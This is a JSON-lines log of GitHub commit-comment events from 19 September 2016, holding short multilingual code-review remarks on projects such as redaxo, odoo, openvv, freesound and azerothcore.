{"id":"4583043021","type":"CommitCommentEvent","actor":{"login":"gemcfadyen"},"repo":{"name":"christophgockel/goony"},"payload":{"comment":{"id":19077956,"position":null,"line":null,"path":null,"commit_id":"070b311c5723f8186066f9147ab9ec61adb56605","created_at":"2016-09-19T12:41:53Z","updated_at":"2016-09-19T12:41:53Z","body":"👍 "}},"created_at":"2016-09-19T12:41:53Z"}
{"id":"4583044349","type":"CommitCommentEvent","actor":{"login":"AndrejGit"},"repo":{"name":"AndrejGit/pGUI"},"payload":{"comment":{"id":19077960,"position":null,"line":null,"path":null,"commit_id":"aea6be29eedc4cbf6ad57e8b105699d4f98fd644","created_at":"2016-09-19T12:42:11Z","updated_at":"2016-09-19T12:42:11Z","body":"PFont initialising issues also fixed."}},"created_at":"2016-09-19T12:42:11Z"}
{"id":"4583044869","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":19077963,"position":6,"line":133,"path":"redaxo/src/core/lib/response.php","commit_id":"173ef7ce9b371fbd37c0b15f5dd70121b919dff1","created_at":"2016-09-19T12:42:16Z","updated_at":"2016-09-19T12:42:16Z","body":"Für mich war es reproduzierbar notwendig hier, ansonsten hat die Ausführung von `RESPSONSE_SHUTDOWN` das Beenden der Anfrage noch blockiert. "}},"created_at":"2016-09-19T12:42:16Z"}
{"id":"4583046100","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077967,"position":47,"line":76,"path":"hydrator-plugins/spark-plugins/src/test/java/co/cask/hydrator/plugin/batch/spark/test/LogisticRegressionTrainerTest.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:42:32Z","updated_at":"2016-09-19T12:42:32Z","body":"since schema and sourceSchema  are almost same can we declare only 1 variable and use a function to add a field to schema to create sourceSchema"}},"created_at":"2016-09-19T12:42:32Z"}
{"id":"4583051206","type":"CommitCommentEvent","actor":{"login":"yschimke"},"repo":{"name":"ReactiveSocket/reactivesocket-cpp"},"payload":{"comment":{"id":19077977,"position":4,"line":74,"path":"src/ConnectionAutomaton.cpp","commit_id":"69fb87269aa954bd8427b8b7f042e9f26772cdd2","created_at":"2016-09-19T12:43:36Z","updated_at":"2016-09-19T12:43:36Z","body":"We are having a commit war over these changes.  Atom and my clang-format are both formatting the top red changes.\r\n\r\nYour devtools/format_all.sh is apparently producing the bottom green format."}},"created_at":"2016-09-19T12:43:36Z"}
{"id":"4583052906","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":19077980,"position":6,"line":133,"path":"redaxo/src/core/lib/response.php","commit_id":"173ef7ce9b371fbd37c0b15f5dd70121b919dff1","created_at":"2016-09-19T12:44:00Z","updated_at":"2016-09-19T12:44:00Z","body":"Gefällt mir auch nicht, wenn es irgendeine andere Lösung gäbe, wäre ich froh."}},"created_at":"2016-09-19T12:44:00Z"}
{"id":"4583053346","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19077983,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-19T12:44:07Z","updated_at":"2016-09-19T12:44:07Z","body":"er ya idk tbh, no idea what to suggest either, just it sticks out a lot."}},"created_at":"2016-09-19T12:44:07Z"}
{"id":"4583055380","type":"CommitCommentEvent","actor":{"login":"GrantAfrica"},"repo":{"name":"GrantAfrica/hello-world"},"payload":{"comment":{"id":19077987,"position":3,"line":3,"path":"README.md","commit_id":"9e0486a8121134c586a5c6b9ce7e254f3cc5a168","created_at":"2016-09-19T12:44:32Z","updated_at":"2016-09-19T12:44:32Z","body":"just a comment"}},"created_at":"2016-09-19T12:44:32Z"}
{"id":"4583056511","type":"CommitCommentEvent","actor":{"login":"jamierocks"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19077993,"position":13,"line":35,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T12:44:47Z","updated_at":"2016-09-19T12:44:47Z","body":"Javadoc needs updating"}},"created_at":"2016-09-19T12:44:47Z"}
{"id":"4583056596","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077994,"position":null,"line":null,"path":null,"commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:44:48Z","updated_at":"2016-09-19T12:44:48Z","body":"Few comments"}},"created_at":"2016-09-19T12:44:48Z"}
{"id":"4583056978","type":"CommitCommentEvent","actor":{"login":"GrantAfrica"},"repo":{"name":"GrantAfrica/hello-world"},"payload":{"comment":{"id":19077996,"position":3,"line":3,"path":"README.md","commit_id":"9e0486a8121134c586a5c6b9ce7e254f3cc5a168","created_at":"2016-09-19T12:44:53Z","updated_at":"2016-09-19T12:44:53Z","body":"not true\r\n"}},"created_at":"2016-09-19T12:44:53Z"}
{"id":"4583061888","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19078007,"position":null,"line":null,"path":null,"commit_id":"b7f75fd8cbc539eb318be9cf79ab371e985b696e","created_at":"2016-09-19T12:45:53Z","updated_at":"2016-09-19T12:45:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OxrWrXbrQ5S-evjs5VmPLg"}},"created_at":"2016-09-19T12:45:53Z"}
{"id":"4583063416","type":"CommitCommentEvent","actor":{"login":"Maslovsky-Alexey"},"repo":{"name":"MeatAss/Dulo"},"payload":{"comment":{"id":19078011,"position":null,"line":null,"path":null,"commit_id":"ad03ad9ffecaffff705cd013085f5990d6b61fce","created_at":"2016-09-19T12:46:14Z","updated_at":"2016-09-19T12:46:14Z","body":"#Cover me! Imfuckin reload.\r\n```\r\nif (Iam.FuckingReload())\r\n{\r\n    CoverMe();\r\n}\r\nelse\r\n{\r\n    NotCoverMe();\r\n}\r\n```"}},"created_at":"2016-09-19T12:46:14Z"}
{"id":"4583072301","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078028,"position":5,"line":78,"path":"addons/mrp/wizard/mrp_product_produce.py","commit_id":"962a207f6abe3b23178dbfc0fd6df28ec2bfa897","created_at":"2016-09-19T12:47:49Z","updated_at":"2016-09-19T12:47:49Z","body":"also you should export the po and say it to mat :)"}},"created_at":"2016-09-19T12:47:49Z"}
{"id":"4583073676","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19078038,"position":null,"line":null,"path":null,"commit_id":"95800a65664674cbcfe68010e521769d14dc49b4","created_at":"2016-09-19T12:48:06Z","updated_at":"2016-09-19T12:48:06Z","body":"good stuff :+1: "}},"created_at":"2016-09-19T12:48:06Z"}
{"id":"4583080733","type":"CommitCommentEvent","actor":{"login":"advir1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078045,"position":475,"line":1156,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T12:49:24Z","updated_at":"2016-09-19T12:49:24Z","body":"should the IO viewability state affect the measurability of the ad? what happens when beacons don't work but IO does? as long as we're in test mode, the ad should be considered unmeasurable. in that case, we will also not really have any numbers to compare, so unclear whether we should monitor such situations (comparing apples and unmeasurable apples)."}},"created_at":"2016-09-19T12:49:24Z"}
{"id":"4583084926","type":"CommitCommentEvent","actor":{"login":"Midaychi"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":19078052,"position":null,"line":null,"path":null,"commit_id":"309b5832b8c66f382716364fb2e6e21f53b7d59b","created_at":"2016-09-19T12:50:13Z","updated_at":"2016-09-19T12:50:13Z","body":"@mugling @Rivet-the-Zombie \r\nThis change added the bandit vowel, probably."}},"created_at":"2016-09-19T12:50:13Z"}
{"id":"4583088000","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19078056,"position":null,"line":null,"path":null,"commit_id":"9c13370ec33dad0e4f096447dbc5fd597f06d75a","created_at":"2016-09-19T12:50:48Z","updated_at":"2016-09-19T12:50:48Z","body":"@Creeperface01 What do you mean???"}},"created_at":"2016-09-19T12:50:48Z"}
{"id":"4583092225","type":"CommitCommentEvent","actor":{"login":"dadaxr"},"repo":{"name":"bolt/Members"},"payload":{"comment":{"id":19078060,"position":58,"line":146,"path":"src/Controller/Membership.php","commit_id":"ab5cecc68a3b6a37e0dbc1d9531e25ddbb35b6b3","created_at":"2016-09-19T12:51:40Z","updated_at":"2016-09-19T12:51:40Z","body":"$this->getMemberConfig() No ? as :\r\n\r\n/**\r\n     * @internal Should only be used by traits.\r\n     *\r\n     * @return Config\r\n     */\r\n    protected function getConfig()\r\n\r\n\r\nidem for other calls\r\n"}},"created_at":"2016-09-19T12:51:40Z"}
{"id":"4583092687","type":"CommitCommentEvent","actor":{"login":"OutdatedVersion"},"repo":{"name":"OutdatedVersion/sparkwings.github.io"},"payload":{"comment":{"id":19078061,"position":null,"line":null,"path":null,"commit_id":"c66e60c37f28196992e8a6d6dc8298a9bc151686","created_at":"2016-09-19T12:51:46Z","updated_at":"2016-09-19T12:51:46Z","body":"the indentation is pretty great "}},"created_at":"2016-09-19T12:51:46Z"}
{"id":"4583094132","type":"CommitCommentEvent","actor":{"login":"zhangyijiao"},"repo":{"name":"zhangyijiao/Network"},"payload":{"comment":{"id":19078064,"position":null,"line":null,"path":null,"commit_id":"f92a7908f6248ab8e1488833a920ac9b155c5d9d","created_at":"2016-09-19T12:52:05Z","updated_at":"2016-09-19T12:52:05Z","body":"写反了，应该是用2替换了1"}},"created_at":"2016-09-19T12:52:05Z"}
{"id":"4583094833","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/ledger-publisher"},"payload":{"comment":{"id":19078068,"position":null,"line":null,"path":null,"commit_id":"4316ca9050abb77bdd7d03b41206238435bdea46","created_at":"2016-09-19T12:52:14Z","updated_at":"2016-09-19T12:52:14Z","body":" @mrose17 pls handle the review, thx!"}},"created_at":"2016-09-19T12:52:14Z"}
{"id":"4583097828","type":"CommitCommentEvent","actor":{"login":"Kitzberger"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19078075,"position":null,"line":null,"path":null,"commit_id":"36166de3ce47c2cc8d6ef450f80ca8127d6b7bbd","created_at":"2016-09-19T12:52:48Z","updated_at":"2016-09-19T12:52:48Z","body":"@dmitryd: any forecast possible when the release of 2.0.16 will be?"}},"created_at":"2016-09-19T12:52:48Z"}
{"id":"4583098153","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":19078077,"position":15,"line":141,"path":"redaxo/src/core/lib/response.php","commit_id":"173ef7ce9b371fbd37c0b15f5dd70121b919dff1","created_at":"2016-09-19T12:52:52Z","updated_at":"2016-09-19T12:52:52Z","body":"funktioniert das auch, wenn die session nicht gestarted ist?"}},"created_at":"2016-09-19T12:52:52Z"}
{"id":"4583098946","type":"CommitCommentEvent","actor":{"login":"jimin1992"},"repo":{"name":"jimin1992/bluehouseproject-"},"payload":{"comment":{"id":19078080,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-19T12:53:01Z","updated_at":"2016-09-19T12:53:01Z","body":"good"}},"created_at":"2016-09-19T12:53:01Z"}
{"id":"4583099030","type":"CommitCommentEvent","actor":{"login":"klg73x"},"repo":{"name":"klg73x/People"},"payload":{"comment":{"id":19078081,"position":null,"line":null,"path":null,"commit_id":"361431e718757f38da643fb4db89970bdbb4a990","created_at":"2016-09-19T12:53:03Z","updated_at":"2016-09-19T12:53:03Z","body":"Initial setup"}},"created_at":"2016-09-19T12:53:03Z"}
{"id":"4583099347","type":"CommitCommentEvent","actor":{"login":"advir1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078083,"position":485,"line":1165,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T12:53:07Z","updated_at":"2016-09-19T12:53:07Z","body":"IO should not affect our viewability reporting, and should be excluded from this condition"}},"created_at":"2016-09-19T12:53:07Z"}
{"id":"4583104789","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/Members"},"payload":{"comment":{"id":19078095,"position":58,"line":146,"path":"src/Controller/Membership.php","commit_id":"ab5cecc68a3b6a37e0dbc1d9531e25ddbb35b6b3","created_at":"2016-09-19T12:54:11Z","updated_at":"2016-09-19T12:54:11Z","body":"Damn copy/pasta"}},"created_at":"2016-09-19T12:54:11Z"}
{"id":"4583109104","type":"CommitCommentEvent","actor":{"login":"niftylettuce"},"repo":{"name":"koajs/csrf"},"payload":{"comment":{"id":19078104,"position":null,"line":null,"path":null,"commit_id":"9118bb43ca4d2ae3810dc9d117f4a2ff2aa5debe","created_at":"2016-09-19T12:54:58Z","updated_at":"2016-09-19T12:54:58Z","body":"I'm not sure how to update the history.  Also, 3.0.0, 3.0.1, and 3.0.2 were bad releases (had bugs)."}},"created_at":"2016-09-19T12:54:58Z"}
{"id":"4583113692","type":"CommitCommentEvent","actor":{"login":"jonpeterson"},"repo":{"name":"jonpeterson/jackson-module-model-versioning"},"payload":{"comment":{"id":19078110,"position":18,"line":42,"path":"src/main/java/com/github/jonpeterson/jackson/module/versioning/VersionedModelUtils.java","commit_id":"ea2931110bd94c1a72c7da842f2ef852f05a3f1d","created_at":"2016-09-19T12:55:52Z","updated_at":"2016-09-19T12:55:52Z","body":"These changes could cause an NPE on `accessor.getRawType()` when `accessor == null` and `field != null && field.hasAnnotation(...)` and `serializeToVersionProperty == null`."}},"created_at":"2016-09-19T12:55:52Z"}
{"id":"4583117250","type":"CommitCommentEvent","actor":{"login":"jonpeterson"},"repo":{"name":"jonpeterson/jackson-module-model-versioning"},"payload":{"comment":{"id":19078118,"position":null,"line":null,"path":null,"commit_id":"ea2931110bd94c1a72c7da842f2ef852f05a3f1d","created_at":"2016-09-19T12:56:35Z","updated_at":"2016-09-19T12:56:35Z","body":"Can you explain the use case which was triggering these bugs?  I thought I had accounted for fields and method accessors in my unit tests."}},"created_at":"2016-09-19T12:56:35Z"}
{"id":"4583117890","type":"CommitCommentEvent","actor":{"login":"advir1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078119,"position":306,"line":745,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T12:56:41Z","updated_at":"2016-09-19T12:56:41Z","body":"wouldn't this cause an infinite loop, since you call takeRecords() from inside the callback?"}},"created_at":"2016-09-19T12:56:41Z"}
{"id":"4583126158","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19078134,"position":19,"line":233,"path":"config/webpack.common.js","commit_id":"68e796f8578568300d98d206d94381883a61b03b","created_at":"2016-09-19T12:58:18Z","updated_at":"2016-09-19T12:58:18Z","body":"I will do"}},"created_at":"2016-09-19T12:58:18Z"}
{"id":"4583126642","type":"CommitCommentEvent","actor":{"login":"jfkthame"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19078135,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T12:58:23Z","updated_at":"2016-09-19T12:58:23Z","body":"> Request: font-weight: 700\r\n>\r\n> Possible @font-face block declarations (in order):\r\n> font-weight: 699-751\r\n> font-weight: 649-701\r\n> font-weight: 649-751\r\n\r\nISTM that all three of those @font-face blocks can exactly fulfill the requested weight, and therefore the last one wins.\r\n\r\n> Similarly, If the request is 700 but the possible declarations are\r\n> font-weight: 800-801\r\n> font-weight: 800-900\r\n\r\nHere, neither one is an exact match, but both come equally close to the requested value, and so again, last one wins. (The \"badness\" of the match, using a resource that supports weight 800 for a requested weight of 700, is the same in both cases.)\r\n\r\n> The question gets even harder if the request/declarations is/are around 400 & 500.\r\n\r\nYes, that seems like it could get tricky. To be considered further...\r\n\r\nWe should also reconsider the \"search away from normal\" behavior, in the presence of potentially much finer gradations of weight. (Or stretch.) Currently, if a weight of 200 is requested but not available, the algorithm says we search for a lighter weight before considering anything heavier (so that we'll prefer 100 over 300, for instance). But now, the available faces might be one with font-weight:201 and one with font-weight:1; should we still prefer the lighter face even though the heavier one is *much* closer to the requested value?\r\n\r\nThe current algorithm works OK for the very limited number of discrete steps we currently have, but I don't think it will serve so well for continuously-variable properties.\r\n"}},"created_at":"2016-09-19T12:58:23Z"}
{"id":"4583130314","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19078143,"position":null,"line":null,"path":null,"commit_id":"02cb2d050c2edfc46aa0507d46c1b30763467e25","created_at":"2016-09-19T12:59:07Z","updated_at":"2016-09-19T12:59:07Z","body":"Yeah I've seen this before on a github push. Does that kind of stuff sometimes. "}},"created_at":"2016-09-19T12:59:07Z"}
{"id":"4583134813","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19078153,"position":null,"line":null,"path":null,"commit_id":"d2ed7743524a4639706bee8fd05c1c786f738ef4","created_at":"2016-09-19T12:59:58Z","updated_at":"2016-09-19T12:59:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;N8TAuJOH&#x2F;27-charger-les-modules-jbj-dans-le-fichier-castor-config-js\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> charger les modules jbj dans le fichier castor.config.js</a>"}},"created_at":"2016-09-19T12:59:58Z"}
{"id":"4583136778","type":"CommitCommentEvent","actor":{"login":"ajaythomas"},"repo":{"name":"ajaythomas/LeetCodeSolutions"},"payload":{"comment":{"id":19078156,"position":null,"line":null,"path":null,"commit_id":"a388d9d34e9f6a0f0c839d9ff6d08e96df6a434f","created_at":"2016-09-19T13:00:25Z","updated_at":"2016-09-19T13:00:25Z","body":"https://leetcode.com/problems/populating-next-right-pointers-in-each-node/"}},"created_at":"2016-09-19T13:00:25Z"}
{"id":"4583136819","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19078157,"position":13,"line":12,"path":"band-service-client-api/src/main/java/hu/schonherz/training/band/ejb/remote/stateless/BandRemoteService.java","commit_id":"5ed1626a73c3b2cd8b41b15eb0e63779db233ee4","created_at":"2016-09-19T13:00:25Z","updated_at":"2016-09-19T13:00:25Z","body":"You can remove this."}},"created_at":"2016-09-19T13:00:25Z"}
{"id":"4583138671","type":"CommitCommentEvent","actor":{"login":"Frytiks"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":19078162,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-19T13:00:44Z","updated_at":"2016-09-19T13:00:44Z","body":"it's just missing string, \r\n```\r\ndiff --git a/src/game/Chat/Chat.cpp b/src/game/Chat/Chat.cpp\r\nindex 553514d..c1ebadf 100644\r\n--- a/src/game/Chat/Chat.cpp\r\n+++ b/src/game/Chat/Chat.cpp\r\n@@ -270,7 +270,7 @@ bool ChatHandler::ExecuteCommandInTable(std::vector<ChatCommand> const& table, c\r\n         // select subcommand from child commands list\r\n         if (!table[i].ChildCommands.empty())\r\n         {\r\n-            if (!ExecuteCommandInTable(table[i].ChildCommands, text, fullcmd))\r\n+            if (!ExecuteCommandInTable(table[i].ChildCommands, text, fullcmd.c_str()))\r\n             {\r\n                 if (text[0] != '\\0')\r\n                     SendSysMessage(LANG_NO_SUBCMD);\r\n@@ -309,14 +309,14 @@ bool ChatHandler::ExecuteCommandInTable(std::vector<ChatCommand> const& table, c\r\n                         zoneName = zone->area_name[locale];\r\n                 }\r\n \r\n-                sLog->outCommand(m_session->GetAccountId(), \"Command: %s [Player: %s (%ul) (Account: %u) X: %f Y: %f Z: %f Map: %u (%s) Area: %u (%s) Zone: %s Selected: %s (%ul)]\",\r\n+/*                sLog->outCommand(m_session->GetAccountId(), \"Command: %s [Player: %s (%ul) (Account: %u) X: %f Y: %f Z: %f Map: %u (%s) Area: %u (%s) Zone: %s Selected: %s (%ul)]\",\r\n                     fullcmd.c_str(), player->GetName().c_str(), player->GetGUID(),\r\n                     m_session->GetAccountId(), player->GetPositionX(), player->GetPositionY(),\r\n                     player->GetPositionZ(), player->GetMapId(),\r\n                     player->GetMap() ? player->GetMap()->GetMapName() : \"Unknown\",\r\n                     areaId, areaName.c_str(), zoneName.c_str(),\r\n                     (player->GetSelectedUnit()) ? player->GetSelectedUnit()->GetName().c_str() : \"\",\r\n-                    guid);\r\n+                    guid);*/\r\n             }\r\n         }\r\n         // some commands have custom error messages. Don't send the default one in these cases.\r\n```"}},"created_at":"2016-09-19T13:00:44Z"}
{"id":"4583142364","type":"CommitCommentEvent","actor":{"login":"chemPolonium"},"repo":{"name":"CyanogenMod/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19078170,"position":null,"line":null,"path":null,"commit_id":"07b8afdf59bc102ec67ed57f64df567c3f259c47","created_at":"2016-09-19T13:01:26Z","updated_at":"2016-09-19T13:01:26Z","body":"Why disable the GPS?"}},"created_at":"2016-09-19T13:01:26Z"}
{"id":"4583143076","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19078172,"position":null,"line":null,"path":null,"commit_id":"8d80d51255d39eaf4215f0852e76a7366a80bdaf","created_at":"2016-09-19T13:01:34Z","updated_at":"2016-09-19T13:01:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;rSl6hVVF&#x2F;13-ezmasteriser-lodex-avec-la-nouvelle-procedure\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> ezmasteriser lodex avec la nouvelle procédure</a>"}},"created_at":"2016-09-19T13:01:34Z"}
{"id":"4583150206","type":"CommitCommentEvent","actor":{"login":"jczaplew"},"repo":{"name":"UW-Macrostrat/homepage"},"payload":{"comment":{"id":19078183,"position":null,"line":null,"path":null,"commit_id":"795012db9dba02ccc99e49193777f9cc31af3f6c","created_at":"2016-09-19T13:02:57Z","updated_at":"2016-09-19T13:02:57Z","body":"Looks good. Pulled into production."}},"created_at":"2016-09-19T13:02:57Z"}
{"id":"4583150631","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078184,"position":15,"line":365,"path":"addons/mrp/models/mrp_production.py","commit_id":"27e36d110c11a713bcb06361fa40b5c6b18f9429","created_at":"2016-09-19T13:03:03Z","updated_at":"2016-09-19T13:03:03Z","body":"please find the rev where the signature of _generate_raw_move has changed and thus why you have to change things now :)"}},"created_at":"2016-09-19T13:03:03Z"}
{"id":"4583150865","type":"CommitCommentEvent","actor":{"login":"andrebola"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19078185,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-19T13:03:07Z","updated_at":"2016-09-19T13:03:07Z","body":"I measured the time for a text file of 25 MB and with the fork takes 0.06 seconds while zlib takes 0.12 seconds in my machine (i7, 8GB ram).\r\n\r\nAnd from the command line:\r\n```\r\n$ time crc32 ../freesound-data/packs/tmpywBXGp\r\n21e382c6\r\n\r\nreal\t0m0.057s\r\nuser\t0m0.056s\r\nsys\t0m0.000s"}},"created_at":"2016-09-19T13:03:07Z"}
{"id":"4583151762","type":"CommitCommentEvent","actor":{"login":"yminn13"},"repo":{"name":"yminn13/daily_kernel"},"payload":{"comment":{"id":19078190,"position":1,"line":1,"path":"select_task_rq_fair.c","commit_id":"c65bb59dd09769e6d2d5e29e452fe8a4dbda8785","created_at":"2016-09-19T13:03:19Z","updated_at":"2016-09-19T13:03:19Z","body":"kernel/sched/fair.c"}},"created_at":"2016-09-19T13:03:19Z"}
{"id":"4583154557","type":"CommitCommentEvent","actor":{"login":"BlombergFredrik"},"repo":{"name":"BlombergFredrik/TESTAR"},"payload":{"comment":{"id":19078195,"position":null,"line":null,"path":null,"commit_id":"53b4f43a813e0f48db15398dba61e9b85e865be3","created_at":"2016-09-19T13:03:48Z","updated_at":"2016-09-19T13:03:48Z","body":"gfdg"}},"created_at":"2016-09-19T13:03:48Z"}
{"id":"4583155393","type":"CommitCommentEvent","actor":{"login":"jimin1992"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19078197,"position":null,"line":null,"path":null,"commit_id":"8233f33b992d3b6d4b999f6a592176a82bd59044","created_at":"2016-09-19T13:03:57Z","updated_at":"2016-09-19T13:03:57Z","body":"저도 1도 소수라고 나오네요"}},"created_at":"2016-09-19T13:03:57Z"}
{"id":"4583156081","type":"CommitCommentEvent","actor":{"login":"advir1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078200,"position":299,"line":738,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T13:04:08Z","updated_at":"2016-09-19T13:04:08Z","body":"$ovv.DEBUG should not be used"}},"created_at":"2016-09-19T13:04:08Z"}
{"id":"4583156284","type":"CommitCommentEvent","actor":{"login":"zhjc1124"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":19078202,"position":null,"line":null,"path":null,"commit_id":"26d56c940e7482a7319a86f9aa17e6ec12e1e3ef","created_at":"2016-09-19T13:04:11Z","updated_at":"2016-09-19T13:04:11Z","body":"........"}},"created_at":"2016-09-19T13:04:11Z"}
{"id":"4583159631","type":"CommitCommentEvent","actor":{"login":"zhjc1124"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":19078205,"position":null,"line":null,"path":null,"commit_id":"26d56c940e7482a7319a86f9aa17e6ec12e1e3ef","created_at":"2016-09-19T13:04:46Z","updated_at":"2016-09-19T13:04:46Z","body":"我自己过几天闲的时候再试试。。。"}},"created_at":"2016-09-19T13:04:46Z"}
{"id":"4583161285","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078210,"position":null,"line":null,"path":null,"commit_id":"27e36d110c11a713bcb06361fa40b5c6b18f9429","created_at":"2016-09-19T13:05:07Z","updated_at":"2016-09-19T13:05:07Z","body":"[FIX] mrp: change quantity wizard\r\n\r\nFixes a traceback due to rev xxx that changed the signature of `self._generate_raw_move` without adapting it here."}},"created_at":"2016-09-19T13:05:07Z"}
{"id":"4583161980","type":"CommitCommentEvent","actor":{"login":"msdx321"},"repo":{"name":"travismills82/android_kernel_samsung_hero2qltechn"},"payload":{"comment":{"id":19078212,"position":null,"line":null,"path":null,"commit_id":"cd25e6646d40b1ffe3c3e3517019c1dd020e8d18","created_at":"2016-09-19T13:05:17Z","updated_at":"2016-09-19T13:05:17Z","body":"You don't need to add `androidboot.selinux=permissive` in cmdline. Check this commit c8201e5ab7c3a9cc2f723d64c795eb42463da04a"}},"created_at":"2016-09-19T13:05:17Z"}
{"id":"4583166421","type":"CommitCommentEvent","actor":{"login":"ffont"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19078218,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-19T13:06:07Z","updated_at":"2016-09-19T13:06:07Z","body":"Sorry, I meant time for the whole pack download thing comparing using pre-computed files vs generating the files on the fly.\nI guess the only difference is the time that it takes to generate the file (including write to disk). Because after being generated the file is read from disk as if it was there before right? Then maybe it should be just a matter to see the time required for doing this with packs of different sizes. There are packs with more than 7000 sounds ;)\n\n\n\n---\nFrederic Font\nMusic Technology Group\nUniversitat Pompeu Fabra\nfrederic.font@upf.edu\n\nFreesound | www.freesound.org\nAudio Commons | www.audiocommons.org\n\n\n\n\n\n> On 19 Sep 2016, at 15:03, Andres Ferraro <notifications@github.com> wrote:\n> \n> I measured the time for a text file of 25 MB and with the fork takes 0.06 seconds while zlib takes 0.12 seconds in my machine (i7, 8GB ram).\n> \n> And from the command line:\n> \n> $ time crc32 ../freesound-data/packs/tmpywBXGp\n> 21e382c6\n> \n> real    0m0.057s\n> user    0m0.056s\n> sys 0m0.000s\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/MTG/freesound/commit/0fa36f20c80b2128b88715020136babd15e4055d#commitcomment-19078185>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAdNl3pPGfz5YI1H9Qo8kljHfeRAqr0Yks5qrogMgaJpZM4KAapH>.\n> \n\n"}},"created_at":"2016-09-19T13:06:07Z"}
